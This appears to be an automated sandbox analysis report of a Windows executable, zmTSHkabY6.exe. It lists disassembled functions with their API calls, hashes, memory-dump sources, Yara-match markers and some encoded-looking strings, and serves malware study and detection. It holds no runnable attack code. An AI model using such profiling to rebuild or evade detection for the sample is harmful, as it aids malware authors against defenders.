                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: C:\Users\user\Desktop\zmTSHkabY6.exe
                                                                    • API String ID: 0-808907004
                                                                    • Opcode ID: 9c4445743612698079b74687b6d690de0a76c3e5134965afe2d5fa7eb50f9b57
                                                                    • Instruction ID: f5cbd8e96d27bdc1c45b24e0386b5d428b2a36cebf4c6be1d1b03eefb0cfeaba
                                                                    • Opcode Fuzzy Hash: 9c4445743612698079b74687b6d690de0a76c3e5134965afe2d5fa7eb50f9b57
                                                                    • Instruction Fuzzy Hash: 15416D71A00218AFCF21EBA99C819AEBBF9EBC5310B901066F519F7211E7709A41CB94
                                                                    Function 0041017D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: C:\Users\user\Desktop\zmTSHkabY6.exe
                                                                    • API String ID: 0-808907004
                                                                    • Opcode ID: 071b538174e6ec2062faa24906a4cfa7e50636e93d54360a723864c0abc3d007
                                                                    • Instruction ID: ef1b21c86d4c641325268a2e562e5aacaa8476dc5588200f607cc18d3bf73bc2
                                                                    • Opcode Fuzzy Hash: 071b538174e6ec2062faa24906a4cfa7e50636e93d54360a723864c0abc3d007
                                                                    • Instruction Fuzzy Hash: A8416471E00214ABCB219B999C85AEFBBF8EFD4350B1440ABF50497251D7B99EC1CB98
                                                                    Function 00E8AE47 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00E8AE86
                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00E8AF3A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                    • String ID: csm
                                                                    • API String ID: 3480331319-1018135373
                                                                    • Opcode ID: 33bf7593fb2420a6276facfce688e1aeeae85943ba4b5033adcc5dff2c976554
                                                                    • Instruction ID: 0d3e3ba527afb51fede9bccf230295a5150f2a37de4b985ea2622551ed7ed367
                                                                    • Opcode Fuzzy Hash: 33bf7593fb2420a6276facfce688e1aeeae85943ba4b5033adcc5dff2c976554
                                                                    • Instruction Fuzzy Hash: FF41E470A002189BDF10EF68C884ADEBBF5BF45318F189066E91CBB352D7359E55CB92
                                                                    Function 00E8B6EC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RtlEncodePointer.NTDLL(00000000), ref: 00E8B711
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: EncodePointer
                                                                    • String ID: MOC$RCC
                                                                    • API String ID: 2118026453-2084237596
                                                                    • Opcode ID: 16a00d9b10077e87a2e6bda56ac5cedb43e1d1180fe444446107c7dbba074086
                                                                    • Instruction ID: c01451688d0046c082db7cacc982c2c832204db7c6edd2d39bc2f964afae9c7f
                                                                    • Opcode Fuzzy Hash: 16a00d9b10077e87a2e6bda56ac5cedb43e1d1180fe444446107c7dbba074086
                                                                    • Instruction Fuzzy Hash: C1415872900209AFCF15EF98C881AEEBBB5FF48308F189169FA0DB7252D3359951DB51
                                                                    Function 0040B485 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RtlEncodePointer.NTDLL(00000000), ref: 0040B4AA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: EncodePointer
                                                                    • String ID: MOC$RCC
                                                                    • API String ID: 2118026453-2084237596
                                                                    • Opcode ID: 16a00d9b10077e87a2e6bda56ac5cedb43e1d1180fe444446107c7dbba074086
                                                                    • Instruction ID: 67f376c023d9800a5206fdaf198d645220277734bcfb559d46511f35e7f4eabb
                                                                    • Opcode Fuzzy Hash: 16a00d9b10077e87a2e6bda56ac5cedb43e1d1180fe444446107c7dbba074086
                                                                    • Instruction Fuzzy Hash: 95415871900209AFDF15DF94CD81AAEBBB5EF48308F1480AAFA1576291D3399A50DB98
                                                                    Function 100044D6 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • EncodePointer.KERNEL32(00000000,?), ref: 100044FB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3223708397.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.3223691367.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3223729109.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3223747769.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: EncodePointer
                                                                    • String ID: MOC$RCC
                                                                    • API String ID: 2118026453-2084237596
                                                                    • Opcode ID: ca9cd7b99e72cbf3783ae7526526635f66225abf8acecb3cb58be7c4c4c22851
                                                                    • Instruction ID: 0fa13f4c886c2deeb8e1184eea68dc96f9460117e0f406c7378fe553058e7938
                                                                    • Opcode Fuzzy Hash: ca9cd7b99e72cbf3783ae7526526635f66225abf8acecb3cb58be7c4c4c22851
                                                                    • Instruction Fuzzy Hash: 7B419DB5900109AFEF06CF94CC81AEE7BB5FF48384F168059F9046B25AD736EA50CB55
                                                                    Function 00E81597 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00E893D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00E893E2
                                                                      • Part of subcall function 00E893D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00E8941F
                                                                    • __Init_thread_footer.LIBCMT ref: 00E81622
                                                                      • Part of subcall function 00E8938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00E89397
                                                                      • Part of subcall function 00E8938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00E893CA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                                    • String ID: FEKN$NE]D
                                                                    • API String ID: 4132704954-517842756
                                                                    • Opcode ID: 7d1b909681db53285071ff40672d1c380c008a281c48190cd621e0695607241e
                                                                    • Instruction ID: f1b467e77b617a9ec32485f8195df8120495957f5052b3ca67556ad42c17e395
                                                                    • Opcode Fuzzy Hash: 7d1b909681db53285071ff40672d1c380c008a281c48190cd621e0695607241e
                                                                    • Instruction Fuzzy Hash: 60218C70B00645CFD720EF28E8467B837A0EF55304FA852A9D85C2B652E7B52586C7CD
                                                                    Function 00401330 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00409170: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040917B
                                                                      • Part of subcall function 00409170: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 004091B8
                                                                    • __Init_thread_footer.LIBCMT ref: 004013BB
                                                                      • Part of subcall function 00409126: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00409130
                                                                      • Part of subcall function 00409126: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409163
                                                                      • Part of subcall function 00409126: RtlWakeAllConditionVariable.NTDLL ref: 004091DA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                                    • String ID: FEKN$NE]D
                                                                    • API String ID: 2296764815-517842756
                                                                    • Opcode ID: 37e1153e5d0601956be4df5595081ba34075aac515f72f9cd57d9b237f69f675
                                                                    • Instruction ID: bb411daeb84ba6cc8782813aab56c5dc80a7b29e6052d91cba9c4b608feb04e2
                                                                    • Opcode Fuzzy Hash: 37e1153e5d0601956be4df5595081ba34075aac515f72f9cd57d9b237f69f675
                                                                    • Instruction Fuzzy Hash: 51215C30B00245CBD720CF29E846BA977B0FB95304F94427AD8542B7A3DBB92586C7DD
                                                                    Function 00E87967 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00E893D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00E893E2
                                                                      • Part of subcall function 00E893D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00E8941F
                                                                    • __Init_thread_footer.LIBCMT ref: 00E879D5
                                                                      • Part of subcall function 00E8938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00E89397
                                                                      • Part of subcall function 00E8938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00E893CA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                                    • String ID: CD^O$_DC[
                                                                    • API String ID: 4132704954-3597986494
                                                                    • Opcode ID: a0a846a2b5bc40eacf458633a07b7fd0d6dae78898cee81696ac0ea38ef941e0
                                                                    • Instruction ID: dfeffa4687f5bc53bd10059198556e597fa9e33559de966257bc77496d2f001a
                                                                    • Opcode Fuzzy Hash: a0a846a2b5bc40eacf458633a07b7fd0d6dae78898cee81696ac0ea38ef941e0
                                                                    • Instruction Fuzzy Hash: 5B01F970F00208CBC720FFA8BD4266D77F4EB04310F9592AAE51D67292E7759945CBC9
                                                                    Function 00E87F27 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00E893D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00E893E2
                                                                      • Part of subcall function 00E893D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00E8941F
                                                                    • __Init_thread_footer.LIBCMT ref: 00E87F95
                                                                      • Part of subcall function 00E8938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00E89397
                                                                      • Part of subcall function 00E8938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00E893CA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                                    • String ID: CD^O$_DC[
                                                                    • API String ID: 4132704954-3597986494
                                                                    • Opcode ID: f117a8599e5a5b64357cd679555c90fdeb56fb08607ed05f2cce84a05c41c654
                                                                    • Instruction ID: a794b1304716ad6d6dadcee9978dcc96e6721814e03bbe7f70ec96750f0fc94a
                                                                    • Opcode Fuzzy Hash: f117a8599e5a5b64357cd679555c90fdeb56fb08607ed05f2cce84a05c41c654
                                                                    • Instruction Fuzzy Hash: BF01D670F04205CFC720FFA9BD429AD73A5EB44310BA81179E52D67242E77499458BD9
                                                                    Function 00407CC0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00409170: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040917B
                                                                      • Part of subcall function 00409170: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 004091B8
                                                                    • __Init_thread_footer.LIBCMT ref: 00407D2E
                                                                      • Part of subcall function 00409126: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00409130
                                                                      • Part of subcall function 00409126: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409163
                                                                      • Part of subcall function 00409126: RtlWakeAllConditionVariable.NTDLL ref: 004091DA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                                    • String ID: CD^O$_DC[
                                                                    • API String ID: 2296764815-3597986494
                                                                    • Opcode ID: 53c53f0d35d6ef20f9dfb6d629afc077c30de4eaa3ac919fd52d2abd114ead8e
                                                                    • Instruction ID: 8bf2ad3165393ed28199ca71651b1e02a490a28405ec2f0c6d2e7b73ba48d91c
                                                                    • Opcode Fuzzy Hash: 53c53f0d35d6ef20f9dfb6d629afc077c30de4eaa3ac919fd52d2abd114ead8e
                                                                    • Instruction Fuzzy Hash: 1C012630F002059BC720EF6AAD0196973B4FB59300B84017AE5146B282E77899428BDE
                                                                    Function 00407700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00409170: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040917B
                                                                      • Part of subcall function 00409170: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 004091B8
                                                                    • __Init_thread_footer.LIBCMT ref: 0040776E
                                                                      • Part of subcall function 00409126: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00409130
                                                                      • Part of subcall function 00409126: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409163
                                                                      • Part of subcall function 00409126: RtlWakeAllConditionVariable.NTDLL ref: 004091DA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                                    • String ID: CD^O$_DC[
                                                                    • API String ID: 2296764815-3597986494
                                                                    • Opcode ID: 6984f13f36b3e6cee961cec358f898ccc9f9a1464559edccbb98c4c3ae659da9
                                                                    • Instruction ID: 44c7e97e152ec1ca5567fde67ff81d8d8e81e117548a1af78ec12ab7f1e6b2a3
                                                                    • Opcode Fuzzy Hash: 6984f13f36b3e6cee961cec358f898ccc9f9a1464559edccbb98c4c3ae659da9
                                                                    • Instruction Fuzzy Hash: 64012670F002089BC720FF69AD41A5973B0E708350F80827EE5196B292EB786941CBCA
                                                                    Function 00E87317 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00E893D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00E893E2
                                                                      • Part of subcall function 00E893D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00E8941F
                                                                    • __Init_thread_footer.LIBCMT ref: 00E87380
                                                                      • Part of subcall function 00E8938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00E89397
                                                                      • Part of subcall function 00E8938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00E893CA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                                    • String ID: DCDO$EDO*
                                                                    • API String ID: 4132704954-3480089779
                                                                    • Opcode ID: 8b51cd775da556fe0e8da68bd1a71e78c45c54a650ae96054a820cef77246584
                                                                    • Instruction ID: 6c655730a581a06613cf295b884ffc62c2d25e3c51daf9e03c3b3cb5da957b8b
                                                                    • Opcode Fuzzy Hash: 8b51cd775da556fe0e8da68bd1a71e78c45c54a650ae96054a820cef77246584
                                                                    • Instruction Fuzzy Hash: E50186B0F01308DFC710EFA4E9825ACB7B0EB05314FA45179DA1D77391D734A9858B89
                                                                    Function 00E87427 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00E893D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00E893E2
                                                                      • Part of subcall function 00E893D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00E8941F
                                                                    • __Init_thread_footer.LIBCMT ref: 00E87490
                                                                      • Part of subcall function 00E8938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00E89397
                                                                      • Part of subcall function 00E8938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00E893CA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                                    • String ID: DCDO$^]E*
                                                                    • API String ID: 4132704954-2708296792
                                                                    • Opcode ID: 39631913317fdbbebfa06f582ff08a226458685357f22e00fc86a48f968bd657
                                                                    • Instruction ID: 87714dc5058540edfb45f85b405dc986a9f4ca8856fab722e564a4da4eca6a85
                                                                    • Opcode Fuzzy Hash: 39631913317fdbbebfa06f582ff08a226458685357f22e00fc86a48f968bd657
                                                                    • Instruction Fuzzy Hash: AE016D70F002089FC720FFA8E99266CBBF4EB04300F98417AD91D67792DB35A9158B99
                                                                    Function 004070B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00409170: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040917B
                                                                      • Part of subcall function 00409170: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 004091B8
                                                                    • __Init_thread_footer.LIBCMT ref: 00407119
                                                                      • Part of subcall function 00409126: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00409130
                                                                      • Part of subcall function 00409126: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409163
                                                                      • Part of subcall function 00409126: RtlWakeAllConditionVariable.NTDLL ref: 004091DA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                                    • String ID: DCDO$EDO*
                                                                    • API String ID: 2296764815-3480089779
                                                                    • Opcode ID: 057ee43e4521391655df31a4c43a3f0a7f6c0038db3df444a4ed800121ff4de1
                                                                    • Instruction ID: 6e88f7cd3849569d85f07cd18ee47690fbb1a730dcdea08f10a2250dba35ba50
                                                                    • Opcode Fuzzy Hash: 057ee43e4521391655df31a4c43a3f0a7f6c0038db3df444a4ed800121ff4de1
                                                                    • Instruction Fuzzy Hash: 1F0186B0F01208AFC710DF55E98255DB7B0E705304F90457ADA15AB3D1DB386D95CB8D
                                                                    Function 004071C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00409170: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040917B
                                                                      • Part of subcall function 00409170: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 004091B8
                                                                    • __Init_thread_footer.LIBCMT ref: 00407229
                                                                      • Part of subcall function 00409126: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00409130
                                                                      • Part of subcall function 00409126: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409163
                                                                      • Part of subcall function 00409126: RtlWakeAllConditionVariable.NTDLL ref: 004091DA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                                    • String ID: DCDO$^]E*
                                                                    • API String ID: 2296764815-2708296792
                                                                    • Opcode ID: da9be0c5e5273d7ee2d012b34ad58f6f2e7d462380927887947c71f03af37cc5
                                                                    • Instruction ID: 8efc7060af64cb8acb1af25de2c4b339d239c6825e953d18f5e204f1a235d67b
                                                                    • Opcode Fuzzy Hash: da9be0c5e5273d7ee2d012b34ad58f6f2e7d462380927887947c71f03af37cc5
                                                                    • Instruction Fuzzy Hash: 8F016D70F002089BC720EF68E94295DB7B0EB08304F9441BEE919A7396DB3969158BCE